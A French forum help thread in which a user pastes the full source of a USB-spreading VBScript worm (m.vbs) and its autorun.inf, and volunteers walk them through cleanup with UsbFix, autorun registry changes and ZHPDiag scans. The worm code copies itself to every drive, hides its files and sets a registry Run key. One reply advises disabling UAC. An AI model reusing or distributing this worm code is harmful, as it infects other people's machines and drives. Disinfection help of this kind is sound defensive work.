Virus m.vbs trouvé maintenant sur clé usb Fermé

Question

Bonjour, Virus trouvé par avast! ... (désactivé 10 minutes pour pouvoir ouvrir le fichier). Quels sont les problèmes (pas assez de connaissances pour décrypté le code)? Clé USB sur "F:" Nom = "NOLIMIT" autorun.inf: [autorun] shellexecute=wscript.exe m.vbs m.vbs: on error resume next dim mysrc,wipth,flshdrv,FiSi,MiFi,tra,TiFi,RiGi,NiTi,chk,SiDi tra = "[autorun]"&vbcrlf&"shellexecute=wscript.exe m.vbs" set FiSi = createobject("Scripting.FileSystemObject") set MiFi = FiSi.getfile(Wscript.ScriptFullname) dim txt,sizi sizi = MiFi.sizi chk = MiFi.drive.drivetype set txt=MiFi.openastextstream(1,-2) do while not txt.atendofstream mysrc=mysrc&txt.readline mysrc=mysrc & vbcrlf loop do Set wipth = FiSi.getspecialfolder(0) set TiFi = FiSi.getfile(wipth & "\m.vbs") TiFi.attributes = 32 set TiFi=FiSi.createtextfile(wipth & "\m.vbs",2,true) TiFi.write mysrc TiFi.close set TiFi = FiSi.getfile(wipth & "\m.vbs") TiFi.attributes = 39 for each flshdrv in FiSi.drives If (flshdrv.drivetype = 1 or flshdrv.drivetype = 2) and flshdrv.path <> "A:" then set TiFi=FiSi.getfile(flshdrv.path &"\m.vbs") TiFi.attributes =32 set TiFi=FiSi.createtextfile(flshdrv.path &"\m.vbs",2,true) TiFi.write mysrc TiFi.close set TiFi=FiSi.getfile(flshdrv.path &"\m.vbs") TiFi.attributes =39 set TiFi =FiSi.getfile(flshdrv.path &"\autorun.inf") TiFi.attributes = 32 set TiFi=FiSi.createtextfile(flshdrv.path &"\autorun.inf",2,true) TiFi.write tra TiFi.close set TiFi =FiSi.getfile(flshdrv.path &"\autorun.inf") TiFi.attributes=39 end if next set RiGi = createobject("WScript.Shell") RiGi.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\m",wipth&"\m.vbs" if chk <> 1 then Wscript.sleep 199999 end if loop while chk<>1 J'ai rien dans "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" pas de *dossier* "m". Avast! Free Antivirus à réagit parce que j'ai voulu ouvrir le fichier m.vbs, après l'a voir vu dans documents récemment ouverts du menu vista, pour voir le contenu. Le simple fait de vouloir voir les propriétés du fichier fait réagir avast!. La clé contient de la musique (et le virus?) qui viens d'un centre de loisir ... Configuration: Windows Vista / Firefox 3.6.10/Bonhomme 2010 de service (aide *panne* pc = clic clic clic virus, tu peux venir j'ai un problème, clic clic clic virus (...) ffff...ouuucht...) merci

flo-91 · Accepted Answer

Bonsoir,

En effet, tu as une infection usb, pour la traiter :


/!\ Utilisateur de vista et windows 7 : ne pas oublier de désactiver Le contrôle des comptes utilisateurs
https://www.commentcamarche.net/faq/8343-vista-desactiver-l-uac 

>Usbfix<

>Télécharge USBFIX de Chiquitine29, C_xx  ici :

http://pagesperso-orange.fr/NosTools/Chiquitine29/UsbFix.exe

>/!\ Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) susceptible d'avoir été infectées sans les ouvrir 

> Double clic sur le raccourci UsbFix présent sur le bureau .

>Choisir l'option 2 Suppression et laisser travailler l'outil

Ensuite poste le rapport UsbFix.txt qui apparaîtra.


* Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque. ( C:\UsbFix.txt )

* Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus (AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool.
Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...) d'où l'alerte émise par ces antivirus.


* Tuto : http://pagesperso-orange.fr/NosTools/usbfix.html

rapide · Answer

############################## | UsbFix 7.027 | [Recherche]

(...)

################## | Mountpoints2 |

HKCU\.\.\.\.\Explorer\MountPoints2\{63b48f78-fd14-11de-916e-001c252d61d2}
Shell\AutoRun\Command = C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe m.vbs

HKCU\.\.\.\.\Explorer\MountPoints2\{e14d00eb-b43c-11dd-af30-001c252d61d2}
Shell\AutoRun\Command = J:\setup\rsrc\Autorun.exe
Shell\dinstall\Command = J:\Directx\dxsetup.exe


################## | Vaccin |

(!) Cet ordinateur n'est pas vacciné!

################## | E.O.F |



--------------------



Dans:
Panneau de configuration\Programmes par défaut (dans le menu "Démarrer" sur option!)
Puis:
Panneau de configuration\Exécution automatique ("Modifier les paramètres de la lecture automatique")

Tout est à:
"Toujours me demander"

=

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"NoDriveAutoRun"=dword:00000003



--------------------



############################## | UsbFix 7.027 | [Suppression]

Utilisateur: (...) (Administrateur) # (...) [PACKARD BELL BV IMEDIA F9218 AIO]
Mis à jour le 28/09/10 par El Desaparecido / C_XX
Lancé à 23:26:00 | 02/10/2010
Site Web: http://www.teamxscript.org
Contact: FindyKill.Contact@gmail.com

CPU: Intel(R) Pentium(R) D CPU 3.00GHz
Microsoft® Windows Vista(TM) Édition Familiale Premium  (6.0.6002 32-Bit) # Service Pack 2
Internet Explorer 8.0.6001.18943

Pare-feu Windows: Activé
RAM -> 2046 Mo 
C:\ (%systemdrive%) -> Disque fixe # 185 Go (14 Go libre(s) - 8%) [A2C-VISTA] # NTFS
D:\ -> Disque fixe # 40 Go (19 Go libre(s) - 48%) [A3D-DONNEES] # NTFS
F:\ -> Disque amovible # 4 Go (2 Go libre(s) - 66%) [NOLIMIT] # FAT32
I:\ -> CD-ROM

################## | Éléments infectieux |



################## | Registre |


################## | Mountpoints2 |

Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{63b48f78-fd14-11de-916e-001c252d61d2}
Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{e14d00eb-b43c-11dd-af30-001c252d61d2}

################## | Listing |

(...) 1ou 2 fichiers persos identifiants dans c:\ ... notamment (duplicate save) & rien de bizarre.

################## | Vaccin |

C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
D:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
F:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

################## | E.O.F |



--------------------



Dans:
Panneau de configuration\Programmes par défaut (dans le menu "Démarrer" sur option!)
Puis:
Panneau de configuration\Exécution automatique ("Modifier les paramètres de la lecture automatique")

Tout est à:
"Toujours me demander"

=

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"NoDriveAutoRun"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000000
"BindDirectlyToPropertySetStorage"=dword:00000000
"NoDriveAutoRun"=dword:00000003


Ok ...


Note: Pour passer l'UAC sur Vista, démarrez UsbFix.exe par clic droit puis item "Exécuter en tant qu'administrateur" ; puis à CHAQUE BLOCAGE ou Freezage de Windows Vista et donc de UsbFix.exe, faites touches Ctrl + Alt + Suppr, puis touche "Echap" ! UsbFix.exe fonctionne ...


Comment faire pour désactiver la fonctionnalité exécution automatique dans Windows :
https://support.microsoft.com/fr-fr/help/967715/how-to-disable-the-autorun-functionality-in-windows

The benefit of using NoDriveTypeAutoRun, rather than NoDriveAutoRun, is that you can fine-tune which drives you wish to disable. For example, you can disable all network and all unknown drives from running AutoPlay, but allow CD-ROM drives to run AutoPlay, and thus start automatically. PAGE SOURCE CITATION.

Pas vraiment ok ... ! o_O ? Les deux valeurs (4 en fait = 2 dans/par user(s) et 2 dans machine) doivent être correcte ou une domine l'autre ? Et quid de la clé "HonorAutorunSetting" de type REG_DWORD ; plage = 0x0-0xFF ; par défaut = "0 x 01" (absente) ?


1 port usb libre ... donc 1 seule clé usb. Est-ce que le fichier virus ou surtout le lanceur "autorun.inf" peuvent se cacher sur les disques durs formatés en ntfs par les ACL (permissions) NTFS ou par Alternate Data Stream en NTFS ? J'aurais un disque dur externe "WE" (à brancher sur la tv et m*rdique au plus possible car l'usb ne fonctionne pas bien sur Vista et avec ce pc = connexion usb instable) à vérifier, d'où la question ; (mais c'est en Fat32 je crois).

flo-91 · Answer

Tu n'a pas de ports usb à l'arrière du pc ?

Rapide · Answer

Bonjour,

(CCLEANER = startup.txt = 1 ligne ici)

Oui	HKLM:RunOnce	InnoSetupRegFile.0000000001	"C:\Windows\is-AFARJ.exe" /REG

Est-ce que cette ligne ci-dessus est normal ; merci ?

J'ai trouvé cela :

Inno Setup Unpacker | Download Inno Setup Unpacker software for free at SourceForge.net :
https://sourceforge.net/projects/innounp/

merci

Rapide · Answer

Non, enfin pas libre. clavier/souris (récepteur sans fil), webcam et imprimante.

flo-91 · Answer

Tu me fais quoi là ?

Fait ceci :


On va commencer par analyser ton pc, :

Télécharges Zhpdiag ici : https://www.zebulon.fr/telechargements/securite/systeme/zhpdiag.html

Une fois le téléchargement achevé, dézippes le fichier obtenu et place ZHPDiag.exe sur ton Bureau.

Double-clique sur l'icône pour lancer le programme.

Clique sur Tous pour cocher toutes les cases des options.

Clique sur la loupe pour lancer l'analyse.

A la fin de l'analyse, clique sur l'appareil photo et enregistre le rapport sur ton Bureau.

Ouvre le fichier sauvegardé (ZHPDiag.txt)avec le Bloc-Notes et copie son contenu dans ta réponse.

Rends toi sur http://www.cijoint.fr clic sur Parcourir, choisis le rapport sur ton bureau et clic sur Créer le lien,
Un lien te sera généré, postes le dans ta prochaine réponse .

Virus m.vbs trouvé maintenant sur clé usb

6 réponses

Discussions similaires